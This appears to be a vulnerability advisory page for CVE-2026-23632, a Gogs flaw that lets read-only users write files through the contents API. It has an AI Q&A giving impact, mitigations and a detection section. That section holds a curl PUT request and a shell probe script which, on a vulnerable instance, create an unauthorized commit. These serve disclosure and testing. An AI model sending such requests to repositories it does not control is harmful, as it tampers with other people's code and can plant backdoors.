CVE-2026-23632
Unauthorized Write Access in Gogs Repository via Insufficient Permission Check
Publication date: 2026-02-06
Last updated on: 2026-02-17
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| gogs | gogs | to 0.13.4 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-863 | The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. |
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-23632 is an authorization flaw in Gogs, the self-hosted Git service, affecting versions up to and including 0.13.3. The API endpoint PUT /repos/:owner/:repo/contents/* lets a caller modify repository contents without holding write permission on the repository: the handler only runs repoAssignment(), which verifies that the caller can read the repository, and never checks for write access. It then calls PutContents(), which invokes UpdateRepoFile(), creating a commit and pushing it to the repository. The net effect is that a caller whose access to the repository is read-only can change its files.
The attacker needs a valid access token belonging to a user with read access to the target repository: any authenticated user for a public repository, or a collaborator who was granted only read access. With that token, a single PUT request updating an arbitrary file path produces an unauthorized commit and push.
How can this vulnerability impact me?
The impact is loss of repository integrity: unauthorized modification of source code, injection of backdoors, and, where releases or packages are built from the repository, compromise of the resulting artifacts. Because any user with read access can push changes, every public repository on a vulnerable instance, and every private repository with read-only collaborators, should be treated as writable by those users until the instance is patched.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection has two parts: confirm the running Gogs version, and, on a repository you are allowed to write to, verify whether the endpoint enforces write permission.
First, check whether the instance runs a vulnerable version (0.13.3 or earlier; the fix is in 0.13.4).
Second, test the endpoint: send a PUT to /api/v1/repos/:owner/:repo/contents/* using a token that belongs to a user with only read access to the repository, and observe whether a commit is created. Run this only against a throwaway repository, because on a vulnerable instance the request really does commit and push the change. Example using curl (replace the placeholders):

```sh
curl -X PUT \
  -H "Authorization: token <read-only-token>" \
  -H "Content-Type: application/json" \
  -d '{"content":"<base64-encoded-content>","message":"test commit"}' \
  https://<gogs-instance>/api/v1/repos/<owner>/<repo>/contents/<file-path>
```

If the request succeeds and the repository history now contains the commit, the instance is vulnerable; a patched instance refuses the write for a user without write permission. Independently of the probe, review recent commits on exposed repositories for changes pushed by users who should only have had read access. [1]
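The same probe, wrapped so it can be run repeatably and its result read off the HTTP status rather than eyeballed. This is an added example, not Gogs project code and not from the original page. It assumes the operator sets the hypothetical variables GOGS_URL, GOGS_TOKEN (a token of a read-only user) and TARGET (owner/repo of a throwaway repository), that the default branch is named master, and that a patched instance answers the unauthorized write with 403; confirm the verdict against the repository's commit history either way.

```sh
#!/bin/sh
# Added example (not Gogs project code): probe whether
# PUT /api/v1/repos/:owner/:repo/contents/* accepts a write from a token
# whose owner only has read access to the repository.
# Assumptions (hypothetical): GOGS_URL, GOGS_TOKEN and TARGET are exported by
# the operator, the default branch is "master", and TARGET is a throwaway
# repository you are allowed to modify, because a vulnerable instance will
# really commit and push the probe file.
set -u

# Build the JSON body the contents API expects: base64 content plus a commit
# message and branch. Assumes the message needs no JSON escaping.
build_body() {
    content=$1; message=$2; branch=${3:-master}
    b64=$(printf '%s' "$content" | base64 | tr -d '\n')   # tr: GNU base64 wraps lines
    printf '{"content":"%s","message":"%s","branch":"%s"}' "$b64" "$message" "$branch"
}

# Map the HTTP status of the PUT to a verdict. A 2xx for a read-only user means
# the write was accepted, i.e. the instance is vulnerable. 403 is assumed to be
# the refusal a patched instance (or a blocking reverse proxy) returns.
interpret_status() {
    case $1 in
        200|201) echo VULNERABLE ;;
        401)     echo UNAUTHENTICATED ;;  # token rejected; the test said nothing
        403)     echo NOT_VULNERABLE ;;   # write refused
        404)     echo NOT_FOUND ;;        # wrong repo/branch/path, or endpoint hidden
        *)       echo "UNEXPECTED_$1" ;;
    esac
}

# Send the PUT and print only the HTTP status code.
probe() {
    url=$1; token=$2; body=$3
    curl -sS -o /dev/null -w '%{http_code}' \
        -X PUT \
        -H "Authorization: token $token" \
        -H "Content-Type: application/json" \
        --data "$body" \
        "$url"
}

main() {
    url="$GOGS_URL/api/v1/repos/$TARGET/contents/cve-2026-23632-probe.txt"
    body=$(build_body "probe $(date -u +%Y%m%dT%H%M%SZ)" "CVE-2026-23632 probe")
    status=$(probe "$url" "$GOGS_TOKEN" "$body")
    verdict=$(interpret_status "$status")
    echo "PUT $url -> HTTP $status: $verdict"
    if [ "$verdict" = VULNERABLE ]; then
        echo "A commit was created with read-only access; check the repository history and upgrade to 0.13.4 or later."
    fi
}

# Only fire the network probe when the operator has supplied the target.
if [ -n "${GOGS_URL:-}" ] && [ -n "${GOGS_TOKEN:-}" ] && [ -n "${TARGET:-}" ]; then
    main
fi
```

Usage: `GOGS_URL=https://gogs.example.internal GOGS_TOKEN=... TARGET=someone/throwaway sh probe.sh`. The probe writes a uniquely named file so repeated runs are distinguishable in the commit log; delete the file and revoke the test token afterwards.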
What immediate steps should I take to mitigate this vulnerability?
The immediate fix is to upgrade Gogs to version 0.13.4 or later, where the endpoint requires write permission before modifying repository contents.
Note that the check that fails is the token owner's permission on the repository, not anything about the token itself, so any token held by a read-only user can be used. In addition to upgrading, review who holds read access to sensitive repositories (read-only collaborators, and every authenticated user in the case of public repositories), consider revoking or rotating tokens of accounts you do not trust, and audit recent commits on exposed repositories for changes their authors should not have been able to push.
If you cannot upgrade immediately, block PUT requests to /api/v1/repos/*/contents/* at the reverse proxy in front of Gogs, or restrict network access to the API until the upgrade is done; both are stopgaps that also break legitimate API-driven file updates, so remove them once the instance is patched.